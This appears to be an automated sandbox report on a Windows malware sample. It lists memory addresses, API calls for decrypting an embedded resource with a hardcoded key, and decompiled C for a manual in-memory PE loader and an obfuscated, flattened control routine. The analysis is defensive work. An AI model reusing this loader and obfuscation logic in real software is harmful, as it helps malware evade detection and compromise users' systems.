                                                      0x00233d48
                                                      0x00233d50
                                                      0x00233d5b
                                                      0x00233d66
                                                      0x00233d6e
                                                      0x00233d7b
                                                      0x00233d8f
                                                      0x00233d9b
                                                      0x00233da2
                                                      0x00233dad
                                                      0x00233db8
                                                      0x00233dc3
                                                      0x00233dce
                                                      0x00233dd9
                                                      0x00233de4
                                                      0x00233df9
                                                      0x00233e01
                                                      0x00233e08
                                                      0x00233e13
                                                      0x00233e2a
                                                      0x00233e2e
                                                      0x00233e36
                                                      0x00233e3b
                                                      0x00233e43
                                                      0x00233e56
                                                      0x00233e65
                                                      0x00233e6c
                                                      0x00233e77
                                                      0x00233e7f
                                                      0x00233e87
                                                      0x00233e8f
                                                      0x00233e97
                                                      0x00233e9f
                                                      0x00233eaa
                                                      0x00233eb2
                                                      0x00233ec6
                                                      0x00233ecd
                                                      0x00233ed8
                                                      0x00233ee3
                                                      0x00233ef6
                                                      0x00233efd
                                                      0x00233f08
                                                      0x00233f08
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00233f19
                                                      0x00233f19
                                                      0x00234295
                                                      0x00234297
                                                      0x002342cb
                                                      0x002342d4
                                                      0x002342dc
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f13
                                                      0x00233f0d
                                                      0x002342a7
                                                      0x002342b0
                                                      0x002342b2
                                                      0x0023411e
                                                      0x0023411e
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f0d
                                                      0x00233f1f
                                                      0x00233f25
                                                      0x00234129
                                                      0x0023412f
                                                      0x002341a9
                                                      0x002341af
                                                      0x00234278
                                                      0x0023427f
                                                      0x00000000
                                                      0x0023427f
                                                      0x002341b5
                                                      0x002341bb
                                                      0x0023424e
                                                      0x00234255
                                                      0x00000000
                                                      0x00234255
                                                      0x002341bd
                                                      0x002341c3
                                                      0x00234214
                                                      0x0023421f
                                                      0x00234227
                                                      0x00000000
                                                      0x00234227
                                                      0x002341c5
                                                      0x002341cb
                                                      0x00000000
                                                      0x00000000
                                                      0x002341df
                                                      0x002341e8
                                                      0x002341f0
                                                      0x00000000
                                                      0x002341f0
                                                      0x00234131
                                                      0x00234837
                                                      0x00234851
                                                      0x00234858
                                                      0x00234858
                                                      0x00234137
                                                      0x0023413d
                                                      0x0023419a
                                                      0x0023419f
                                                      0x00000000
                                                      0x0023419f
                                                      0x0023413f
                                                      0x00234145
                                                      0x00234184
                                                      0x00234189
                                                      0x00000000
                                                      0x00234189
                                                      0x00234147
                                                      0x0023414d
                                                      0x0023416c
                                                      0x00000000
                                                      0x0023416c
                                                      0x0023414f
                                                      0x00234155
                                                      0x00000000
                                                      0x00000000
                                                      0x00234162
                                                      0x00000000
                                                      0x00234162
                                                      0x00233f2b
                                                      0x0023410d
                                                      0x00234116
                                                      0x00234118
                                                      0x00234118
                                                      0x00000000
                                                      0x00234118
                                                      0x00233f31
                                                      0x00233f37
                                                      0x00233ffd
                                                      0x00234003
                                                      0x002340ea
                                                      0x002340f5
                                                      0x002340fc
                                                      0x00000000
                                                      0x002340fc
                                                      0x00234009
                                                      0x0023400f
                                                      0x002340c9
                                                      0x002340ce
                                                      0x002340d5
                                                      0x00000000
                                                      0x002340d5
                                                      0x00234015
                                                      0x0023401b
                                                      0x0023405c
                                                      0x00234069
                                                      0x00234074
                                                      0x00234079
                                                      0x0023407c
                                                      0x0023407e
                                                      0x002340b4
                                                      0x002340b4
                                                      0x00000000
                                                      0x002340b4
                                                      0x00234080
                                                      0x00234096
                                                      0x0023409d
                                                      0x002340a3
                                                      0x002340aa
                                                      0x00000000
                                                      0x002340aa
                                                      0x0023401d
                                                      0x00234023
                                                      0x00000000
                                                      0x00000000
                                                      0x00234034
                                                      0x00234042
                                                      0x0023404b
                                                      0x0023404b
                                                      0x00000000
                                                      0x0023404b
                                                      0x00233f3d
                                                      0x00233fee
                                                      0x00233ff3
                                                      0x00000000
                                                      0x00233ff3
                                                      0x00233f49
                                                      0x00233fdd
                                                      0x00000000
                                                      0x00233fdd
                                                      0x00233f55
                                                      0x00233fc7
                                                      0x00233fcc
                                                      0x00233fd3
                                                      0x00000000
                                                      0x00233fd3
                                                      0x00233f5d
                                                      0x00233faf
                                                      0x00000000
                                                      0x00233faf
                                                      0x00233f65
                                                      0x00233f98
                                                      0x00233f9d
                                                      0x00233f9f
                                                      0x00000000
                                                      0x00233fa5
                                                      0x00233fa5
                                                      0x00000000
                                                      0x00233fa5
                                                      0x00233f9f
                                                      0x00233f6d
                                                      0x00000000
                                                      0x00233f73
                                                      0x00233f81
                                                      0x00233f86
                                                      0x00000000
                                                      0x00233f86
                                                      0x002342e7
                                                      0x002342e7
                                                      0x002342ed
                                                      0x00234632
                                                      0x00234638
                                                      0x00234736
                                                      0x0023473c
                                                      0x00234818
                                                      0x0023481d
                                                      0x00000000
                                                      0x0023481d
                                                      0x00234742
                                                      0x00234748
                                                      0x002347b9
                                                      0x002347dc
                                                      0x002347e1
                                                      0x002347f2
                                                      0x00234800
                                                      0x00234807
                                                      0x00000000
                                                      0x00234807
                                                      0x0023474a
                                                      0x00234750
                                                      0x00234778
                                                      0x00234783
                                                      0x00000000
                                                      0x00234783
                                                      0x00234752
                                                      0x00234758
                                                      0x00000000
                                                      0x00000000
                                                      0x00234769
                                                      0x0023476e
                                                      0x00000000
                                                      0x0023476e
                                                      0x0023463e
                                                      0x0023471a
                                                      0x00234725
                                                      0x0023472c
                                                      0x00000000
                                                      0x0023472c
                                                      0x00234644
                                                      0x0023464a
                                                      0x002346f7
                                                      0x002346fc
                                                      0x002346fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00234704
                                                      0x00000000
                                                      0x00234704
                                                      0x00234650
                                                      0x00234656
                                                      0x002346d2
                                                      0x002346e0
                                                      0x00000000
                                                      0x002346e6
                                                      0x00234658
                                                      0x0023465e
                                                      0x0023468a
                                                      0x00234691
                                                      0x00234697
                                                      0x00234699
                                                      0x0023469b
                                                      0x002346a3
                                                      0x002346b3
                                                      0x002346ba
                                                      0x002346ba
                                                      0x00000000
                                                      0x002346ba
                                                      0x00234660
                                                      0x00234666
                                                      0x00000000
                                                      0x00000000
                                                      0x00234670
                                                      0x00234675
                                                      0x00000000
                                                      0x00234675
                                                      0x002342f3
                                                      0x0023461d
                                                      0x00234628
                                                      0x00000000
                                                      0x00234628
                                                      0x002342f9
                                                      0x002342ff
                                                      0x00234463
                                                      0x00234469
                                                      0x0023453f
                                                      0x0023454d
                                                      0x00234551
                                                      0x00234558
                                                      0x0023455f
                                                      0x00234567
                                                      0x00234568
                                                      0x0023456d
                                                      0x00234570
                                                      0x00234572
                                                      0x002345c8
                                                      0x002345fb
                                                      0x00234600
                                                      0x00234605
                                                      0x00234610
                                                      0x00234615
                                                      0x00234574
                                                      0x00234578
                                                      0x002345a2
                                                      0x002345a7
                                                      0x002345ac
                                                      0x002345b3
                                                      0x002345b5
                                                      0x002345b7
                                                      0x002345bc
                                                      0x002345bc
                                                      0x00233f08
                                                      0x00233f08
                                                      0x00000000
                                                      0x00233f08
                                                      0x00233f08
                                                      0x0023446f
                                                      0x00234475
                                                      0x002344f3
                                                      0x0023451d
                                                      0x00234522
                                                      0x00234527
                                                      0x0023452e
                                                      0x00234530
                                                      0x00234532
                                                      0x00234537
                                                      0x00000000
                                                      0x00234537
                                                      0x00234477
                                                      0x0023447d
                                                      0x002344d6
                                                      0x002344db
                                                      0x002344e2
                                                      0x00000000
                                                      0x002344e2
                                                      0x0023447f
                                                      0x00234485
                                                      0x00000000
                                                      0x00000000
                                                      0x00234499
                                                      0x002344ac
                                                      0x002344b5
                                                      0x002344bd
                                                      0x00000000
                                                      0x002344bd
                                                      0x00234305
                                                      0x002343e8
                                                      0x002343e8
                                                      0x002343ea
                                                      0x0023441b
                                                      0x00234427
                                                      0x0023442e
                                                      0x00234437
                                                      0x0023443e
                                                      0x00234440
                                                      0x00000000
                                                      0x00000000
                                                      0x0023444a
                                                      0x0023444f
                                                      0x00234451
                                                      0x00234459
                                                      0x00234459
                                                      0x00000000
                                                      0x00234459
                                                      0x00234453
                                                      0x00000000
                                                      0x00000000
                                                      0x00234455
                                                      0x00234457
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00234457
                                                      0x002343ec
                                                      0x002343ec
                                                      0x00000000
                                                      0x002343ec
                                                      0x0023430b
                                                      0x0023430d
                                                      0x0023484c
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                                      • API String ID: 0-1872862241
                                                      • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                                      • Instruction ID: daba2ee547ca6feaad999e9b2e4adc7da7e2402ee05818fcb828c7da64c631ab
                                                      • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                                      • Instruction Fuzzy Hash: 08D213B15193818BD378DF25C58ABDFBBE1BBC4304F10891DE19A862A0DBB49959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                                      • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                                      • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                                      • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                                        • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                                      • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                                      • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                                      • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                                      • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                                      • _memmove.LIBCMT ref: 1000139C
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                                      • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                                      • API String ID: 2007481169-3150289311
                                                      • Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                                      • Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
                                                      • Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                                      • Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                      				intOrPtr _v8;
                                                      				void* _v12;
                                                      				intOrPtr _v44;
                                                      				char _v48;
                                                      				signed int _t67;
                                                      				void* _t72;
                                                      				long _t74;
                                                      				void* _t86;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				void* _t95;
                                                      				intOrPtr _t98;
                                                      				intOrPtr* _t100;
                                                      				void* _t109;
                                                      				intOrPtr _t111;
                                                      				void* _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t117;
                                                      				intOrPtr _t118;
                                                      				intOrPtr* _t128;
                                                      				intOrPtr* _t129;
                                                      				signed int _t131;
                                                      				intOrPtr _t133;
                                                      				signed int _t135;
                                                      				long _t138;
                                                      				long _t139;
                                                      				void* _t147;
                                                      				void* _t148;
                                                      				void* _t149;
                                                      				void* _t150;
                                                      
                                                      				_t113 = _a8;
                                                      				_t147 = 0;
                                                      				_v8 = __ecx;
                                                      				if(_t113 >= 0x40) {
                                                      					_t129 = _a4;
                                                      					if( *_t129 == 0x5a4d) {
                                                      						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
                                                      						if(_t113 < _t117 + 0xf8) {
                                                      							goto L1;
                                                      						} else {
                                                      							_t114 = _t117 + _t129;
                                                      							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
                                                      								goto L3;
                                                      							} else {
                                                      								_t12 = _t114 + 0x14; // 0xc033cd33
                                                      								_t67 =  *_t12 & 0x0000ffff;
                                                      								_t13 = _t114 + 6; // 0xe8ef4d8d
                                                      								_t135 =  *_t13 & 0x0000ffff;
                                                      								if(_t135 != 0) {
                                                      									_t14 = _t114 + 0x24; // 0x100013ef
                                                      									_t128 = _t14 + _t67;
                                                      									do {
                                                      										_t15 = _t128 + 4; // 0x12f7805
                                                      										_t133 =  *_t15;
                                                      										_t111 =  *_t128;
                                                      										if(_t133 != 0) {
                                                      											_t112 = _t111 + _t133;
                                                      										} else {
                                                      											_t16 = _t114 + 0x38; // 0xff1075ff
                                                      											_t112 = _t111 +  *_t16;
                                                      										}
                                                      										_t147 =  >  ? _t112 : _t147;
                                                      										_t128 = _t128 + 0x28;
                                                      										_t135 = _t135 - 1;
                                                      									} while (_t135 != 0);
                                                      								}
                                                      								_push( &_v48); // executed
                                                      								L100037FA(); // executed
                                                      								_t118 = _v44;
                                                      								_t19 = _t118 - 1; // -1
                                                      								_t20 = _t114 + 0x50; // 0xcc25d
                                                      								_t21 = _t118 - 1; // -1
                                                      								_t22 = _t118 - 1; // -1
                                                      								_t131 =  !_t21;
                                                      								_t138 = _t19 +  *_t20 & _t131;
                                                      								if(_t138 == (_t22 + _t147 & _t131)) {
                                                      									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
                                                      									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
                                                      									_t148 = _t72;
                                                      									_v12 = _t148;
                                                      									if(_t148 != 0) {
                                                      										L18:
                                                      										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                      										_t139 = _t74;
                                                      										if(_t139 != 0) {
                                                      											 *(_t139 + 4) = _t148;
                                                      											_t27 = _t114 + 0x16; // 0xe85ec033
                                                      											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                                      											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
                                                      											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
                                                      											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
                                                      											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
                                                      											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
                                                      											_t40 = _t114 + 0x54; // 0xec8b55cc
                                                      											if(E100015F0(_a8,  *_t40) == 0) {
                                                      												L36:
                                                      												_t115 = _v8;
                                                      												goto L37;
                                                      											} else {
                                                      												_t42 = _t114 + 0x54; // 0xec8b55cc
                                                      												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
                                                      												_t43 = _t114 + 0x54; // 0xec8b55cc
                                                      												_t149 = _t86;
                                                      												E10001F40(_t149, _a4,  *_t43);
                                                      												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
                                                      												_t150 = _v12;
                                                      												 *_t139 = _t89;
                                                      												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
                                                      												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
                                                      												if(_t90 == 0) {
                                                      													goto L36;
                                                      												} else {
                                                      													_t52 = _t114 + 0x34; // 0xec8b55cc
                                                      													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
                                                      													_t115 = _v8;
                                                      													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
                                                      														 *((intOrPtr*)(_t139 + 0x18)) = 1;
                                                      													} else {
                                                      														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
                                                      													}
                                                      													if(E10001470(_t115, _t139) == 0) {
                                                      														L37:
                                                      														E10001980(_t139);
                                                      														return 0;
                                                      													} else {
                                                      														_t95 = E10001830(_t115, _t139); // executed
                                                      														if(_t95 == 0 || E10001730(_t139) == 0) {
                                                      															goto L37;
                                                      														} else {
                                                      															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
                                                      															if(_t98 == 0) {
                                                      																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
                                                      																return _t139;
                                                      															} else {
                                                      																_t100 = _t98 + _t150;
                                                      																if( *(_t139 + 0x14) == 0) {
                                                      																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
                                                      																	return _t139;
                                                      																} else {
                                                      																	_push(0);
                                                      																	_push(1);
                                                      																	_push(0x10000000);
                                                      																	if( *_t100() != 0) {
                                                      																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
                                                      																		return _t139;
                                                      																	} else {
                                                      																		SetLastError(0x45a);
                                                      																		E10001980(_t139);
                                                      																		return 0;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										} else {
                                                      											VirtualFree(_t148, _t74, 0x8000);
                                                      											goto L20;
                                                      										}
                                                      									} else {
                                                      										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
                                                      										_t148 = _t109;
                                                      										_v12 = _t109;
                                                      										if(_t148 == 0) {
                                                      											L20:
                                                      											SetLastError(0xe);
                                                      											return 0;
                                                      										} else {
                                                      											goto L18;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									SetLastError(0xc1);
                                                      									return 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L3:
                                                      						SetLastError(0xc1);
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					SetLastError(0xd);
                                                      					return 0;
                                                      				}
                                                      			}




































                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                                      • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                                      • Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
                                                      • Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                                      • Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00244B41() {
                                                      				char _v520;
                                                      				signed int _v524;
                                                      				signed int _v528;
                                                      				signed int _v532;
                                                      				signed int _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				signed int _v576;
                                                      				signed int _v580;
                                                      				signed int _v584;
                                                      				signed int _v588;
                                                      				signed int _v592;
                                                      				intOrPtr _t200;
                                                      				signed int _t202;
                                                      				signed int _t206;
                                                      				void* _t210;
                                                      				signed int _t211;
                                                      				signed int _t212;
                                                      				void* _t214;
                                                      				signed int _t216;
                                                      				signed int _t239;
                                                      				signed int _t240;
                                                      				signed int _t241;
                                                      				signed int _t242;
                                                      				signed int _t243;
                                                      				signed int _t244;
                                                      				void* _t245;
                                                      				signed int* _t247;
                                                      				void* _t249;
                                                      
                                                      				_t247 =  &_v592;
                                                      				_v592 = 0xe399;
                                                      				_v592 = _v592 << 2;
                                                      				_t214 = 0xf501058;
                                                      				_v592 = _v592 << 0xe;
                                                      				_v592 = _v592 ^ 0xe399001c;
                                                      				_v588 = 0x8f0f;
                                                      				_v588 = _v588 * 0x29;
                                                      				_t245 = 0;
                                                      				_v588 = _v588 ^ 0x0016e94e;
                                                      				_v568 = 0x725;
                                                      				_t239 = 0x36;
                                                      				_v568 = _v568 / _t239;
                                                      				_t240 = 0xc;
                                                      				_v568 = _v568 * 0x63;
                                                      				_v568 = _v568 << 8;
                                                      				_v568 = _v568 ^ 0x000ca091;
                                                      				_v532 = 0x951;
                                                      				_v532 = _v532 << 7;
                                                      				_v532 = _v532 ^ 0x0004989a;
                                                      				_v524 = 0x2ad;
                                                      				_v524 = _v524 | 0xf8213247;
                                                      				_v524 = _v524 ^ 0xf82150c2;
                                                      				_v548 = 0x8830;
                                                      				_v548 = _v548 >> 0xd;
                                                      				_v548 = _v548 >> 0xf;
                                                      				_v548 = _v548 ^ 0x00006238;
                                                      				_v588 = 0xba20;
                                                      				_v588 = _v588 | 0x721cc32f;
                                                      				_v588 = _v588 ^ 0x721c8c06;
                                                      				_v580 = 0x8092;
                                                      				_v580 = _v580 + 0xfffffe56;
                                                      				_v580 = _v580 / _t240;
                                                      				_v580 = _v580 >> 3;
                                                      				_v580 = _v580 ^ 0x000005b6;
                                                      				_v540 = 0xe99f;
                                                      				_v540 = _v540 + 0xfffff8d3;
                                                      				_v540 = _v540 | 0x984d7063;
                                                      				_v540 = _v540 ^ 0x984d8ec7;
                                                      				_v556 = 0xc4eb;
                                                      				_t241 = 0x4e;
                                                      				_v556 = _v556 * 0x5c;
                                                      				_v556 = _v556 + 0x75ac;
                                                      				_v556 = _v556 ^ 0x00477921;
                                                      				_v536 = 0x9b3b;
                                                      				_v536 = _v536 + 0xaa1d;
                                                      				_v536 = _v536 ^ 0x00012776;
                                                      				_v572 = 0x8e84;
                                                      				_v572 = _v572 * 0x29;
                                                      				_v572 = _v572 / _t241;
                                                      				_v572 = _v572 >> 0xa;
                                                      				_v572 = _v572 ^ 0x000020e9;
                                                      				_v528 = 0xcb2d;
                                                      				_t242 = 0x21;
                                                      				_v528 = _v528 / _t242;
                                                      				_v528 = _v528 ^ 0x00001b4e;
                                                      				_v544 = 0x6df7;
                                                      				_v544 = _v544 ^ 0x414c8853;
                                                      				_t243 = 0x49;
                                                      				_v544 = _v544 * 0x75;
                                                      				_v544 = _v544 ^ 0xd824a1d7;
                                                      				_v552 = 0xc4f0;
                                                      				_v552 = _v552 ^ 0x9d070a5f;
                                                      				_v552 = _v552 + 0xffff498d;
                                                      				_v552 = _v552 ^ 0x9d0763b6;
                                                      				_v564 = 0xe384;
                                                      				_v564 = _v564 ^ 0xde12aa62;
                                                      				_v564 = _v564 | 0x2c019ae9;
                                                      				_v564 = _v564 ^ 0xa4e5f9a5;
                                                      				_v564 = _v564 ^ 0x5af67a61;
                                                      				_v576 = 0x7d9f;
                                                      				_v576 = _v576 + 0x6134;
                                                      				_v576 = _v576 | 0x6ccc595a;
                                                      				_v576 = _v576 ^ 0x0058e7ee;
                                                      				_v576 = _v576 ^ 0x6c9448a2;
                                                      				_v592 = 0x396f;
                                                      				_v592 = _v592 * 7;
                                                      				_v592 = _v592 ^ 0x10cc7cbf;
                                                      				_v592 = _v592 ^ 0x10cdfb96;
                                                      				_v560 = 0x3078;
                                                      				_v560 = _v560 << 8;
                                                      				_t244 = _v588;
                                                      				_v560 = _v560 / _t243;
                                                      				_v560 = _v560 + 0xffff6a19;
                                                      				_v560 = _v560 ^ 0x000f142e;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t249 = _t214 - 0x3227b83a;
                                                      						if(_t249 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t249 == 0) {
                                                      							_v584 = 0xc457;
                                                      							_v584 = _v584 >> 6;
                                                      							_t165 =  &_v584;
                                                      							 *_t165 = _v584 ^ 0x0000030d;
                                                      							__eflags =  *_t165;
                                                      							_t202 =  *0x24ca2c; // 0x698300
                                                      							 *((intOrPtr*)(_t202 + 0x218)) = E00247CC2;
                                                      							L13:
                                                      							_t214 = 0x2ded9275;
                                                      							continue;
                                                      						}
                                                      						if(_t214 == 0xf501058) {
                                                      							_push(_t214);
                                                      							_push(_t214);
                                                      							_t206 = E00238736(0x454);
                                                      							 *0x24ca2c = _t206;
                                                      							__eflags = _t206;
                                                      							if(_t206 == 0) {
                                                      								goto L23;
                                                      							}
                                                      							 *((intOrPtr*)(_t206 + 0x214)) = E002420C5;
                                                      							_t214 = 0x382146c2;
                                                      							continue;
                                                      						}
                                                      						if(_t214 == 0x204dd1d9) {
                                                      							E0023B112();
                                                      							_t214 = 0x354eaa90;
                                                      							continue;
                                                      						}
                                                      						if(_t214 == 0x24baa30b) {
                                                      							_v584 = 0xe62c;
                                                      							_t214 = 0x36e33d60;
                                                      							_v584 = _v584 ^ 0x84d80cbd;
                                                      							_v584 = _v584 ^ 0x84d8eab8;
                                                      							continue;
                                                      						}
                                                      						if(_t214 != 0x2ded9275) {
                                                      							goto L22;
                                                      						}
                                                      						_push(_t214);
                                                      						_push(_t214);
                                                      						E0023C6C7(_v536, _v572,  *0x24ca2c, _t214, _v528, _v584, _v544); // executed
                                                      						_t247 =  &(_t247[7]);
                                                      						_t214 = 0x204dd1d9;
                                                      						_t210 = 1;
                                                      						_t245 =  ==  ? _t210 : _t245;
                                                      					}
                                                      					__eflags = _t214 - 0x354eaa90;
                                                      					if(__eflags == 0) {
                                                      						E00243E3F(_t214,  &_v520, __eflags, _v552, _v564);
                                                      						_t200 = E0023E29C(_v576, _v592,  &_v520);
                                                      						_t216 =  *0x24ca2c; // 0x698300
                                                      						_t247 =  &(_t247[3]);
                                                      						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
                                                      						_t214 = 0xae4e76a;
                                                      						goto L22;
                                                      					}
                                                      					__eflags = _t214 - 0x36e33d60;
                                                      					if(_t214 == 0x36e33d60) {
                                                      						E00235FB2(_v540, _v556, _t244);
                                                      						goto L13;
                                                      					}
                                                      					__eflags = _t214 - 0x382146c2;
                                                      					if(_t214 != 0x382146c2) {
                                                      						goto L22;
                                                      					}
                                                      					_t211 = E00232959(_t214, _v548, _v588, _v580, _v560); // executed
                                                      					_t244 = _t211;
                                                      					_t247 =  &(_t247[4]);
                                                      					__eflags = _t244;
                                                      					if(_t244 == 0) {
                                                      						_t214 = 0x3227b83a;
                                                      					} else {
                                                      						_t212 =  *0x24ca2c; // 0x698300
                                                      						 *((intOrPtr*)(_t212 + 0x224)) = 1;
                                                      						_t214 = 0x24baa30b;
                                                      					}
                                                      					goto L1;
                                                      					L22:
                                                      					__eflags = _t214 - 0xae4e76a;
                                                      				} while (_t214 != 0xae4e76a);
                                                      				L23:
                                                      				return _t245;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
